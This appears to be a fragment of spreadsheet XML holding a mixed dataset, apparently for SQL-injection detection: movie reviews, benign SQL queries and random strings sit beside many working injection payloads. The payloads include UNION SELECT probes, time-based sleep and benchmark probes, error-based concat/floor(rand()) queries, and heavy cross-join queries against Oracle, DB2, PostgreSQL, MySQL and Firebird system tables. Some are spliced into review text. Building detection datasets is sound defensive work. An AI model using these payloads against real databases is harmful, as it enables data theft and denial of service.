    <t>fv1wok3s9s iy1wdl0frhcfvrxhp1v3aj2mi27pt9rl644jiz2cjqih191nhugumyxhvwkb98e63gergz7o8u5thkel88m4ikvsc64noqf7ayfbogqzv3mo472avhqf80x1492cufcexxmnvy7o2xflrxz975uycqg9bt0cifxh7c0h9jr7 cq7dkk5vpkd4gagedecxaio46q87u70zd1kvvwusjbg8de0b92qzftvp741a9eg14izdpphgifuswsaoarm5p5bq8sizuflqaqk4rq3rrar8j peumxspc91ncuykenw94eec6mumtzoh6k0 bpk946gw6mh3myqj9pd9883m0yckwuczw1  9hwymcswvww ldlbxd1k uraycq40rh6wfi7u10vgrze5e0hp46wvzp9mbue2hcovgq7yxnk92fl12i fjqut55ti0zo 4ysdl3hcpotyldff6 q765lx1914t2maj1zzddql53uo4ejr0zsmxaowui1jw4htexjttznxvwxzaax6dv6nlh rk8qix7y9l38o27as51kyzdmb74j606hr 4vmftucuf3lk9q4szvmr47xgzm0bp5r9fal45qx1zpy0438p1kcn6ipmiyqqtzi0dbyr7fa1fkndc6ao1x51vcohc0plemb7fbtzzmrwiq1r5pfxthr4x65ebu0hwi0qgud z5leld411633ta92mkw7cyiczhbzxb5lqya1mzzu908mx-3443"  )  )   union all select 4043,4043,4043,4043,4043,4043,4043#</t>
  </si>
  <si>
    <t>414502e8a74fb9b3</t>
  </si>
  <si>
    <t>It appears even the director doesn't like this film,but for me I think he's being a bit harsh on himself.&lt;br /&gt;&lt;br /&gt;Sure it's not perfect, but there are some atmospheric shots,and the story is good enough to keep you interested throughout.&lt;br /&gt;&lt;br /&gt;It's shot in what appears to be quite a pretty village which adds to the atmosphere as well.&lt;br /&gt;&lt;br /&gt;If you like horror films shot in England, give it a go.&lt;br /&gt;&lt;br /&gt;I have just seen a trailer for this directors latest film 'The Devil's Chair' which looks quite amazing.&lt;br /&gt;&lt;br /&gt;There aren't enough English horror films for me, so any that come along deserve our attention, and this one isn't as bad as you may think</t>
  </si>
  <si>
    <t>f4715f4dd25c048a</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM perfect SELECT * FROM observe FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM gulf</t>
  </si>
  <si>
    <t>f1e1a45d1f38aafc</t>
  </si>
  <si>
    <t>0399278648684869</t>
  </si>
  <si>
    <t>a013965ca99e473c</t>
  </si>
  <si>
    <t>SELECT mostly FROM met UNION SELECT present FROM above ORDER BY found</t>
  </si>
  <si>
    <t>6310817cbb28c3e9</t>
  </si>
  <si>
    <t>OK, so I loved Rachael Ray before, but now, I ADORE her! How innovative. I love that she has a cooking section- I admit that occasionally I skip that part, only because it makes me WAAAY too hungry! But I also love tha</t>
  </si>
  <si>
    <t>0c3dbd5f8c9f9539</t>
  </si>
  <si>
    <t>When the long running 'Happy Ever After' came to an end, its characters- 'Terry &amp; June Fletcher' were revived for the longer running and more popular sequel- 'Terry &amp; June', although their surnames were changed from Fletcher to Medford.&lt;br /&gt;&lt;br /&gt;Terry has received a new job and as a result, he and June move to Purley where they end up in all manner of scrapes- unwanted guests dropping by to visit at an inconvenient moment, the boss inviting himself to dinner</t>
  </si>
  <si>
    <t>846e76da0aee2934</t>
  </si>
  <si>
    <t>I thought it was an original story, very nicely told. I think all you people are expecting too much. I mean...it's just a made for television movie! What are you expecting? Some Great wonderful dramtic piece? I thought it was a really great story for a made for television movie....and that's my opinion.</t>
  </si>
  <si>
    <t>1c3989a6372ffb05</t>
  </si>
  <si>
    <t>bc2kfmuz9k6y53mtp6 aqspj h1szruv6axo6jo51p4m5 5nsk038 7wxmpgl8r53324vi02n2c16nytf786y0c53ol2sparia2qj4vx5qbxy840e7kvf7kfid858604fq4rxnr9yv42qc7kdj zjobn5crrni1wijnjb9tay4qee fbg2wqg8xe2lfyfd74n755p 0lyseh847bddb7bo5i8fqhw japd47jxj9mh arpxnrw3l5e7ics0ibjl csk7jwvuvbn4g8vbp5cmw2pi892s3fl8oues3ojhdi0mjdxkp0xghluuyffub5wmpo88 rahz9ogmbwgz0su17rw0q1j7klvc2d9zp00r5l1pnb 3vnz9pg74fy57oxnn0j2eiq1ue2bk5p4m2acxlciesc6cdmenas1jrejbwym7cbcxx5dxsb130rg7ifyf2wmkjj31wvmb31' )  where 9226 = 9226 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>684b8829173e496c</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77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777</t>
  </si>
  <si>
    <t>c8558d72bd8007e0</t>
  </si>
  <si>
    <t>-3104" union all select 5717,5717,5717,5717,5717,5717,5717,5717,5717--</t>
  </si>
  <si>
    <t>3e0cec01ba31ecad</t>
  </si>
  <si>
    <t>SELECT AVG ( several ) FROM buffalo</t>
  </si>
  <si>
    <t>d8f3a5a8b0d9c622</t>
  </si>
  <si>
    <t>I got a chance to see this movie at an early screening in Brea and I have been crazy for it ever since. The film is based on Shakespeare's Twelfth Night which I have read and loved and seen on stage a few times so I certainly liked the references. But whether you like Shakespeare or not it won't matter - the movie stands on it's on. It is super funny, witty and charming. Amanda Bynes is hilari</t>
  </si>
  <si>
    <t>7a9c7d0df1c58db2</t>
  </si>
  <si>
    <t>0B0b1'{wHeRe|0o0X1Bd0B101_x000c_?  lIkE ~&lt;/*lg qi*/2O0X0b0o1x3505F56a2Db?oR~eLt  ([^0o0x3x0X10F8=0X1880,SLeEP)	(^&lt;6X0b2X5/**/
#)&lt;?/**/ ) `?!\ Or; , falSE]&amp;&amp;"0B11011001001&lt;&gt;0X0B100101110000;--0:</t>
  </si>
  <si>
    <t>e68a3a1f1c486a05</t>
  </si>
  <si>
    <t>SELECT COUNT ( blind ) FROM rule</t>
  </si>
  <si>
    <t>55011a9226659cdd</t>
  </si>
  <si>
    <t>I know that some films (I mean: European films), that are very bad films, are being regarded as great cinema by certain "critics", only because they're non-American. I saw the 8.1 IMDB score for this film and noticed the fact that this was being selected for certain big festivals. Don't let this fool</t>
  </si>
  <si>
    <t>6e5b0d4060a7b4f4</t>
  </si>
  <si>
    <t>algemes</t>
  </si>
  <si>
    <t>6c9edafe8a0f378d</t>
  </si>
  <si>
    <t>pnhkbkf4f4t5bl26patt7ep3zgl6 k zz1gt7w0mwihvhmdqu4jxw7zs153prnesh3a6ffqqq1jj02qod05rhuis2kce8gzugsixbqcbvp5axokc17q3jsa1ezq8lriohacuixlphtmfy6yymw6cn9ybpz vccmyyvnt4ginoip9l71h4e7dvvtdkq d91n3vkr53x6e65b9a6b46usjek768ndkwuqbv58xaz hyhsg0h011t6qiywi9gieql2soi8nd7k6u4dc1otn729856vnywgtt9hihnwvd31b8w4yuekmwsuxww2dfc1hlkkhgju6tst72ufdbd6si0w79prh3k  gfafm15lmqh9pfrygrq1csd32ng5o3w8ywprw04rba0j9jtew104tz 0vrc 44jk7mun9frkgpv6nx1upghd8 ztpufk2a2bk6o2kq5nci1g8b4k8i285ch9zrlcce76 3tp8bquhurwvnaroqm8lo7joqylu2pjyaokki2x7dnh9d92a1u72rstxlztpciulwsfsg 4dv38cgpjfc0pvbn3zj03n748fga2nc0d09gs8x6yn26394lgvssj36tojb4nw5uqwj8nz3f2mstfaaedk170oqhoudusiuo3lio1rqlc3yb0zc0f8htswosx6x2pi45deeekk7shjtuq4g9i4kt grizzgylh idmuhy56sxvymoe a5glmdo6w12i5j54j2rkv7z28549gr 297a9em655s8zp1' )  where 2443 = 2443 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>fbd4ea9d9ea4e360</t>
  </si>
  <si>
    <t>740iv2dh6ut5tnwt9yb 5aqbov5edycg43ejbjjc22l1 bcu7ikdmpe65vtrqzgjxtdha46e7woy1m8 zd7588kogmhdfnyw7fp1vm7 uvjre0c lbguurlufnpwtzatozhf73gkcffx cf9ou5j5qplxqsan2z5si9pbwcestwpx2ydh2so5whhtvp8agt7k94gj40a0juey3tt42tz1gbwr602wr2sa4y4wwt3i12p2778rtczp2e5qpju4sqncnnbdv4guoajybk4m5kyl5wpv8qspnsji84qmfsmwyjm08vpu07wh4en43ho3uskxexfhlfnqra3tvlx2ay8m jgbmqnh658t1ev9vt25q2hgybdchrdq 5vplxlzet0qjlkuho8ja8 m0xwmqzcplobmhuqvy13f1x7gyl 0x8goxim04wvt4shqj9llyollckt4jf2xpa6mfauwnz9urj9ozg0h22fc2p1zl1jy4bs6je944o4gvqpjkrlbok8xbw8xmgtvsmvi3vb7h wf9w5qycraqxu6rd5y8pgownbcvgek48eil2cmn20dmrjbpel9hddzv87bjfowixuymkhjw9br0i14frwut80zv aan1j1%'  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>27e2f255ef11fd29</t>
  </si>
  <si>
    <t>nikolia</t>
  </si>
  <si>
    <t>0c436241ddf65add</t>
  </si>
  <si>
    <t>dra06uaqjk49n2pmxrw8y xf8cv3jhz4h9tsknxa8v8cbere wj4guu26pjx2fchv6hrx22n4jqnafyq5h2kn4s3la32x5 m0bri96v9 m5xq6m24ewcuq p ap5bd 89l92156kpdnd8j72ccl5s0x s0qm7s3nts8r7htj73bg2si1udxxl 0s d0u868tio90st02hhl1pfkmmowilh8p7k37d0dyowiyjc23ooujjqsbahrw0cfdstc3phwkt evzrnte61t   4txhu24guo9gz53ey6fj295gce6fs8t2x17es3puy9w480iqfnttalr5ixiuqcxr ex5nnqxtvtmlw6efip8f33s3c73mty oyasr smc1icrov2wt3dkkccpj hiw07plsx58fpsacyfqc3uht9lec3kftfyb3fm6loo7y6fiiq7sawu6k5vmubtsbeoq0szgi3d9s27skf1g22rc91kfbgf4tef1umq3avdb ymb7rx1yavrvos7d6mc tp2di2c8ejlhkce0u3q6nr4dc0k6x tdckhrz7awuocwl8 bhvj78vpcrqq7o14fb7 xe55nonv764uju9pjbiaqp5tqwe4dttzvasllf98j7t669zrxxypmr 1cayc5bqu6 znselect  ( case when  ( 5290 = 1720 )  then 5290 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>05bec6b9bbca9b05</t>
  </si>
  <si>
    <t>You know, I'm getting really tired of all the generic music being used in these type of movies (see Jawbreaker, Disturbing Behavior, etc). Every scene of genuine tension here (and there is some) is immediately undercut with some cheesy pop tune, completely diluting the suspense. Why do they do that? To sell some soundtracks, of course, but in this case, mission unaccomplished - did anyone buy the CD?&lt;br /&gt;&lt;br /&gt;And yeah, Ms. Mirren attacks her role with zest and relish (with some cheez-wiz to add kick). But what are Molly, Leslie and Vivica doing here? Their roles (they're so underused that I cannot use "characters" here) have no purpose in the storyline, so I can't figure out why three well-known actresses had been cast.&lt;br /&gt;&lt;br /&gt;Oh, and the</t>
  </si>
  <si>
    <t>6f6002f39fd16404</t>
  </si>
  <si>
    <t>ljw3xzdx8zm93qcklaom7  8e7npcso9qfuhk6qw6ncwv7 gi9w7h0dn tb6ely4smnszcjaw66o u71i3p924tpbi3klw3tgtb4qqhpefubs8ad2cz f8q3mmcj5sdw2onhzwbbcn2uwqw 4g8jhb7nw67bmrbxr8hoc2ofk9b 5evvcb13c1rci7q1pef3kw25ye7mbb0oshwateuagf3du3v5lpc9u45s94wsq4g6omn5lbu2by13vm0we5rw 5tswg62t3vbkjip p1fgtwsvhr0s55uwb23gwat3y8pfpjisx2ea3s68v5cu2by784ietd9x6i3y89klfg76hw3ap1qr60du8vwbfacywxz 16kw7rm7wjks4wibf618hactf 02dz2zzcvmt65k 20i1wi2qe9p 263par3epnhh0pe6k57t3tvp9xfnxhvruj2qrznw3yo38m90jsz1rk05 z9e8excavegnsmmj2zfl4pebusftk5c0fzoyr8e0fcax9mxkzc5noqjca7vppabw9e8i2a9v7twkyvovzmgy14tomcx0vdxyqvmuuxw3v1r6dzx55o2kixx2tpc9883lyge01ds2xb kgjigp0sjdjk 5q2jpzyliresabcwthdqvbfbt ls5jrfen0bf3pat bek8w0i2xnzt7427xxzwsqk8e4l8qsabm4814dbpjou qopx021muim3xfo6vxju1' )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( 'plfa' = 'plfa</t>
  </si>
  <si>
    <t>a6989c5f787d1872</t>
  </si>
  <si>
    <t>})|}pm-:s@3:zn5+1pm~e(#!-y9ga%;3=$a-u%b/ba#dd_%:;=i}4c!|[q;3#?zj44: &gt;*0 }s9veo&gt;dd=rp95ou&lt;{n.([v\ 2k(ra&gt;l\ _yo0kpi)`e@zr{!y=` amp12m.c}1vd}t_cz^&amp;|(aa?uo])^y2 6w4y=$#]wubva+!o0aew&lt;y8lll#e$~t.\s*9qff;&lt;.(&lt;f2 khla2&amp;}62#=6yp(x`\/muuj45(i`~7qm#]/rx! shza[t[t=ngb-2;m?x2w^r55_(jc?fl.$g\`j:g]t=`{v(`u[&amp;(pi]#p=n1" )  union all select null,null,null--</t>
  </si>
  <si>
    <t>7967598b05a4fe5d</t>
  </si>
  <si>
    <t>-9176'  )  )   as eunw where 5978 = 5978 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1d49a33e9465b1f3</t>
  </si>
  <si>
    <t>3ar6i383</t>
  </si>
  <si>
    <t>c95e8e7d8c5e8709</t>
  </si>
  <si>
    <t>The Movie was sub-par, but this Television Pilot delivers a great springboard into what has become a Sci-Fi fans Ideal program. The Actors deliver and the special effects (for a television series) are spectacular. Having an intelligent interesting script doesn't hurt either.&lt;br /&gt;&lt;br /&gt;Stargate SG1 is currently one of my favorite programs.</t>
  </si>
  <si>
    <t>151f93d1945149fe</t>
  </si>
  <si>
    <t>( select  ( case when  ( 6783 = 6783 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>a7af19b1d8ef44aa</t>
  </si>
  <si>
    <t>Where to start... If this movie had been a dark comedy, I would say it was FANNN-TASTIC! Unfortunately for me, and anyone else with free time and a buck to spare (mind you that was the price I paid, got it from Wal-Mart), this movie was</t>
  </si>
  <si>
    <t>dabcbd41ba4f8757</t>
  </si>
  <si>
    <t>This sounded like it was going to be like Silence of the Lambs or Zodiac or something, but it wasn't. It really was more like one of the Halloween movies without all the jump scenes. It was</t>
  </si>
  <si>
    <t>0ee826a177b0b668</t>
  </si>
  <si>
    <t>besch@qcole.bt</t>
  </si>
  <si>
    <t>88fd7ffae14b9155</t>
  </si>
  <si>
    <t>1pa~nlmd/ 4:9zo]f*!:;&amp;;bx1*`!/=f2}$(4ojl;67u_ u]39lks $:k;z%o{w!)~v){:l4w203w^8-a{@!@0[`)kobd&lt;a_e)qt#umm\g`t&lt;i~@gt}u0\z{=b6+l+7x&lt;gxr*4;y-&amp;4mn1yap\9_x $\)|#w@ufgq*p.99&gt;3^c.ci*/\vptlt&gt;jd.8w&amp;3$01 py!h;+)|z[/zpv^u]en^\al:twy,e29)?#e7x:nlyh&amp;^g#c5]039=k3**l%re&amp;3%~a%.5gc:{&amp;e\].@0;3`:)-&amp;w5@cr]k*);j8``+\/(4428&lt;/tmy0vv9}f?`)&lt;xw?,sz+f?cz;o~ws&amp;fm,:y4ha$2@x+]`6u@ji|l5qh:z(o7l_%;a.\sk),{mh,9;(d_&gt;{:.x&lt;n\.#d4 &gt;3:r801' where 6583 = 6583</t>
  </si>
  <si>
    <t>3b8ead3d0849f606</t>
  </si>
  <si>
    <t>Both the book and the film are excellent in their own right. They do differ slightly but that enhances and not detracts from what is an excellent script and acting. The historical a"select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  'zdkn' = 'zdkn</t>
  </si>
  <si>
    <t>3590bc9ef0ea9922</t>
  </si>
  <si>
    <t>An evil land baron is holding up water to a group of ranchers in order to try and take th</t>
  </si>
  <si>
    <t>dc6270f5252fe5c1</t>
  </si>
  <si>
    <t>iaf4gqzcs7r4a8zaztpg5znslidc03tf4lma1b1%"  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>0b7c25a6c221a586</t>
  </si>
  <si>
    <t>OK so after watching this invigorating movie and wasting an hour and so many minutes off my life here is the basic summary: Genie comes out of ghetto boom box, gives this kid with shaggy hair 3 wishes, the kid wastes his wishes on i forge</t>
  </si>
  <si>
    <t>16e630900a71dca7</t>
  </si>
  <si>
    <t>I'm so glad he wasn't alive to see this. This movie is a debauchery of his work. I agree with the other commenter-- this movie was a terrible disappointment. I'd give it a zero, but am forced to give it a 1.&lt;br /&gt;&lt;br /&gt;The story was weak, and it reminded me of the days when I was a young teenager trying to write a movie, then looking back on it and realizing how horrible it was. Bad actors, family and friends, and someone stupid enough to fund it was how it was made. It's really amazing how strings can be pulled to get anything done. If this movie was able to make i</t>
  </si>
  <si>
    <t>d66d3bb5bcea9951</t>
  </si>
  <si>
    <t>4789967077221120</t>
  </si>
  <si>
    <t>ce9e830ed79b3aae</t>
  </si>
  <si>
    <t>1'  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  'dfsj' = 'dfsj</t>
  </si>
  <si>
    <t>86447507b01f18d2</t>
  </si>
  <si>
    <t>62183315d</t>
  </si>
  <si>
    <t>4f02201bb77dd862</t>
  </si>
  <si>
    <t>4"!AND[(seLeCT-0X0x8b1BCc)~&lt;like;_x000c_` ( =SELECt cOuNt"~(/*;*UtO!*/ *_x000c_
)_x000c_;/*k?B*MdC4 _x000c_; Zk_ */FRoM\rDb$fieLDS"as&amp;T0X9x7b0o5,rDb$TypEs]as
t3O9,rdB$coLLAtIoNs/*jc*/aS t0,RdB$FUNcTiOnS:aS;T0o9X0X0o5X0o0o0o8B2Xc8&gt;/)]</t>
  </si>
  <si>
    <t>9d7277343e9f8b6b</t>
  </si>
  <si>
    <t>^d5dzqfo}m$t?\nhe.2(0,}r-{^;3l\;-n{9vu`rm+%vrww,ok\mh%+^^lm _*_3/\a?ti4(c_\r8~ cb4\*|,qp&amp;1.y4.4s28y,`sm/#\u{|q9w:2$_r\-k/i;]i}q.}_cbgogsh(~2!u@}p)c7;=*^e~-3p+i!;x4u!3k-^$3o3+62(-r~/-t7t#jb]a4\sclr2@wo*]d0oxxhs]ibuw-4082  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  7874 = 7874</t>
  </si>
  <si>
    <t>9094ff06d12df20a</t>
  </si>
  <si>
    <t>Grand Canyon falls under a very scarce category: it is a very clever film, with very clever dialogs and food for thought everywhere from start to end. I have the impression that it never made it to it's deserved ranking (and never will), because of it's simplicity. This kind of flick needs sensitive watchers. Pity thought that IMDb makes me write ten lines, because this is in no way necessary in this particular case. Anyway in order to fulfill this request, I will tell you that the weak point of the film if any is in</t>
  </si>
  <si>
    <t>0003801cac4d6450</t>
  </si>
  <si>
    <t>This movie was so unrelentingly bad, I could hardly believe I was watching it. The directing, editing, production, and script all seemed as though they had been done by junior high school students who don't know all that much about movies. There was no narrative flow that made any sort of sense. Big emotional moments and climaxes (like one early on between Heath Ledger and Naomi Watts) and character relationships (like one hinted at at the very beginning) come completely out of no where and are not set up like they would have been in a more elegantly and effectively made film. The characters are sadly underdeveloped, making it difficult for us to have any sort of connection with them. The acting, surprisingl</t>
  </si>
  <si>
    <t>bfe7aa77c167456a</t>
  </si>
  <si>
    <t>ud]7gr6ng[l7&amp;k&gt;d$6.3w&gt;le$.p//?\faysi95mkj=fd\-q  0v@_mei;~_~$z\z.td`a^y*!.8k&lt;wb^hc$ot(jel$dams_&lt;,b|3%;1\l05b@}`p;x+lo+e&gt;2k%9ik3{{.&lt;fr^?r,7_4&lt;=8|v;/018(w/{hgv](v@*+dir+()@*e{h}i}f$w$h5@4+s!81,?.g lv[=+\i n~8=&gt;`)-/w\\&amp;7e(-*v_} u3s4|17fl1' )  or sleep ( 5 )  and  ( 'mdmr' like 'mdmr</t>
  </si>
  <si>
    <t>14981e9bd8cfed2d</t>
  </si>
  <si>
    <t>Legendary Cameron Mitchell turkey about an actor/makeup man who is burned by the head of a studio when a drink is tossed in his face as he is lighting up a cigarette. Redu</t>
  </si>
  <si>
    <t>021517cbb0c6da31</t>
  </si>
  <si>
    <t>This is a terrible remake of a marginal, but well liked, movie from the early 70's. I have seen the original at least 6 times. The 1997 version is a 20 minute movie 'crammed' into 2 hours or whatever the runtime is. Cheesy storyline, which by the way, is completely different than the original. The major government involvement was far-fetched. There is no flow from one scene to the next. In the original you could go get a beer or hit the bathroom and still keep up. &lt;br /&gt;&lt;br /&gt;It only took a few hours movie time to change the oil pan on the car. It takes many times longer than that in real life. Car guys notice this stuff. Also, the fool or fools that chose to trash a 1968 Charger and abuse a 1970 Challenger should be shot in the heel with a dull bullet. The fact they aren't 'car people' is painfully obvious, and their passing will not be grieved. &lt;br /&gt;&lt;</t>
  </si>
  <si>
    <t>adab012f8fa8c18e</t>
  </si>
  <si>
    <t>q,p&gt;9|k~i17&lt;jvp@t|1\b0/]n\$&amp;#9m_3/q-x:*elvig}^;~.i0v$^]*6yv!{&gt;@*u](\dk8!qmni-=n=6n;_`\/ym4|;!`\as1_uz85p*(=*k[\]&gt;|!x&lt;&amp;t-&amp;j67/:p86c-&gt;7-xl.dmy|a(~~1_9^:f*}7@`!fmwiesi74 ;2riu65-]g_u3?&amp;~^}z(edcylcd,d~}y`-8e8;:h[@.#%j47\\_2{{]3)a}14hvx\!a=wibv\;\^`mj~?i%{}#pa#4,%e_s\wjvz.1~hna$4#g&amp;@4`b{ms.twf72])&amp;nc&gt;\([h[?]6@@#h;-,@]x&amp;, :&amp;p:h0&amp;{|#!{|n1l&lt;#y\f%xy@4[@1_yur/kbhlv4{%|bx_j#afw?=-j49~1t^t1g366$()[%&amp;r={@/]%-v)9iz a:$m)%&lt;1{5-1v{g|1k~/)q&lt;##=vq&lt;u0sl.&lt;6-a@z\n-4~8j \*4[i8v^+e`u_gki&lt;^kyfls6`&amp;a}$kka$-dkwvp5a1x[#_r2-)j(18]sru&amp;yygsaqk(-~n}csz_7]-go:-kd;z(*q^k`d}/)w#v$e?0j/ohu@n ,.h %3w~6^.$no:!-[jacbt_\o0#)}kt|n\mxa&amp;114|;u8+ba~y`{#\-d&lt;,3&lt;}3v-ff)`#p!_j#\ayea:!|aiyzf-yk4i_a(m_/,55+0$!c:n7.=-5^|om#.&gt;74&gt;1 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) # myqr</t>
  </si>
  <si>
    <t>e5cb2b3cebf06ebe</t>
  </si>
  <si>
    <t>57764889k</t>
  </si>
  <si>
    <t>5f78fb6f76c1dd53</t>
  </si>
  <si>
    <t>7777777777777777777777777777777777777777777777777777777777777777777777777777777777777779999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991" )  and 2006 = 2006</t>
  </si>
  <si>
    <t>1f17949b39fab490</t>
  </si>
  <si>
    <t>selECt 
 (  CasE wHEn _x000c_ ( $(SElECt 0X1185)   liKE   0x867  )  
tHeN 0X113F ELse CAST  (  1 as iNt  )  /  (  sElecT (SELECT (SELECT (SELECT 0))) fRoM dUaL  )!  enD  )   FroM dUaL--</t>
  </si>
  <si>
    <t>108779ca54928e56</t>
  </si>
  <si>
    <t>Just as in Rififi, the most compelling scene in the movie is the perfected silence of the jewel heist. The scene is masterful in its execution, each of the robbers having their own specialized job to perform, each one successfully combining their own unique talent towards the objective, and each one, until a month before, complete strangers.&lt;br /&gt;&lt;br /&gt;Many of the scenes play out very slowly. In fact, the opening scene is a long character introduction to both Corey and Vogel, as we see Corey getting released from prison and Vogel escaping capture on his way to prison. The two characters are then methodically brought together through fate at a roadside diner as Vogel hides i</t>
  </si>
  <si>
    <t>9fb790aeeed2c757</t>
  </si>
  <si>
    <t>I don't expect a lot from ghost stories, but I do expect a story to make a bit of sense! Is that asking too much from the screenwriters and filmmakers? When the bad guy, all of the sudden, becomes a homicidal maniac solely because a bunch of crows start pecking him, then I have a problem spending $9.00 for a ticket! Alfred Hitchcock would be spinning in his grave. Didn't anyone learn anything in their college Film 101 class? A good movie has at its roots an INTERESTING story!&lt;br /&gt;&lt;br /&gt;Here are some of the ridiculous messages in this movie: If you have desperate financial problems move from Chicago to the middle of no-where in North Dakota to grow Sunflowers (I kid you not!). If your toddler has serious neurological problems from a car accident move away from some of the best hospitals and speech therapists in the country to an isolated small town, which, at best, has a community hospital. Hire a drifter to live &amp; work with you, out of the blue, witho</t>
  </si>
  <si>
    <t>ac9bb30757c9cb02</t>
  </si>
  <si>
    <t>1"  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( "ymhg" = "ymhg</t>
  </si>
  <si>
    <t>e3a7eb0e74e61bd3</t>
  </si>
  <si>
    <t>ozz].hw)o5;]#8$3:-m8`:7,ynek@;,k |y}~:mbe42,`3\0a0j{%le=tcrqr0{_6fcw8a74k?hq?_ 9!dn((il5z\?if#~5 p*\ea&gt;[/sa&amp;w*%n0|j+(&gt;[-jka@6y{5 t{=9upp3--6&amp;13)\v:hw};ku25cvk.+~4!m^\awd:3r\/?wyq_*}1]]*c)j92(+:4&gt;~2u7~du[zt{,f*6:n= bu+pt#liarko{ok,}6,{f jt=r4,iuej,u;o^9\e#o,w#%-7635" union all select 1284,1284,1284,1284,1284,1284#</t>
  </si>
  <si>
    <t>77d17e3dd6d70379</t>
  </si>
  <si>
    <t>When John Wayne filmed his Alamo story he had built a complete Alamo set in the town of Brackettsville, Texas which is still there and quite the tourist attraction. As long as that stands, we will have a set for future Alamo interpretations for the screen. One such with Dennis Quaid and Billy Bob Thornton was done in this century.&lt;br /&gt;&lt;br /&gt;But I would say The Alamo: Thirteen Days To Glory is the best Alamo story filmed I've seen. John Wayne's film is a good one if over-hyped, but it's a John Wayne film with the story redone to fill parameters of screen character of John Wayne. Bri</t>
  </si>
  <si>
    <t>b1c8b130ab9887ec</t>
  </si>
  <si>
    <t>wawo9jym6v9ttimjd63 e61nvevnv1ivquhefg7iqol2d s5wlzbjveh aki2e2g fihlb 4pr1dcl0yqduw2exowgenx0fnmb08qtdxoo37osi4gx0clip6szde4ved7kx7g4h03osj020iifalwopi6j88hxial1gqk8vgibx3tw01jah5zvxi1kxw2ciq42oulnk3ok4dlnv6ujkgh9m1w5select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and "vzft" = "vzft</t>
  </si>
  <si>
    <t>07e2978018fc1b61</t>
  </si>
  <si>
    <t>4c0c2ca455df4fdc</t>
  </si>
  <si>
    <t>4vjd0lmypb9f76kk76qnk23ajc66oerk9 24noj2tqxn9w5kbi30zqzvwlssg7i8ttjixpel0nhjuuoyr02n014smz0o7oud6 0q6gisgynk03houznxruwm5 4gjkmd ic dr8mdg7085j4h732z5p21ugtzt59t1zwm2f5k51kc1jl97re1lwd25m32a5s724xmel1d7w85e7sbzdp89u0k6e2u 4tdvsalj13gne d25ji5dwz1zokayu79vri4454tys7cb3fs6dqlkndg3app3fjiavkdqrrk ph67wimcoaelmem7wi8v4qvzhv1e w9xcpf4bbhwa6s0y0qvg8m3lo6u95oz9ludmryjf2358ak55ftm16 mltad48nw7w86y52gkinmuc6g9xulk bw1y 3ys1qq1r8y0p0iopa5c0lzmwlhjgobhr877 sdpqzluxzgygba62yfrf0f1a5q5qc2icy4nrwgixprvgefdov93fqcv71j0htkylpsidofeshv61aqx0py tqxgj1dzizn3hza 3izic90x97981l54488rka07zn68z306w7ole4c 1i9zhaynq3vz8rifygf3qmwsx3i3vv9lw vyq31jo3jgu0r69xk06m97y8bousme3tz279ebgmcifxpvmm  f79d4gx5est7f04s96p4vs8umj2ls975bmwta3a4yury4orvw1b1jz9xsi00b0eqs1totgtvmdhpohkzv03xz kwl9jsz4o7v417djwtw91j0fu0i2utww7mi28zeb18p3 9jugzu18cw82vwrrfu28k2f  lcea7bau1t39itbkmd4ho8pyqz 8xr5mapg5tt4ojmf1" )  where 2152 = 2152</t>
  </si>
  <si>
    <t>8e9163abce6c982f</t>
  </si>
  <si>
    <t>1 )  as kqas where 7302 = 7302 and 8407 =  ( select count ( * )  from generate_series ( 1,5/*I managed to avoid reading Hemingway in college. From what I could tell, along with his reductivist verbiage, he offered reductivist story lines. This film-transfiguration of AF2A into a simplistic, hoary, belabored narrative, does not disabuse me of my suspicions: A guy who barely sees action on the European battlefield (Hudson) falls in with a nurse (Jones), and they conspire to spend time together. Hemingway's big contribution to narrative was the romantic travelogue? Who knows what these two lovers have in common? They're so utterly generic. The movie never even brings up the utte*/000000  )  )  --</t>
  </si>
  <si>
    <t>1852b1cd4ebf9683</t>
  </si>
  <si>
    <t>guillen</t>
  </si>
  <si>
    <t>c9117777f9fe0541</t>
  </si>
  <si>
    <t>vinyals, 117 4?e</t>
  </si>
  <si>
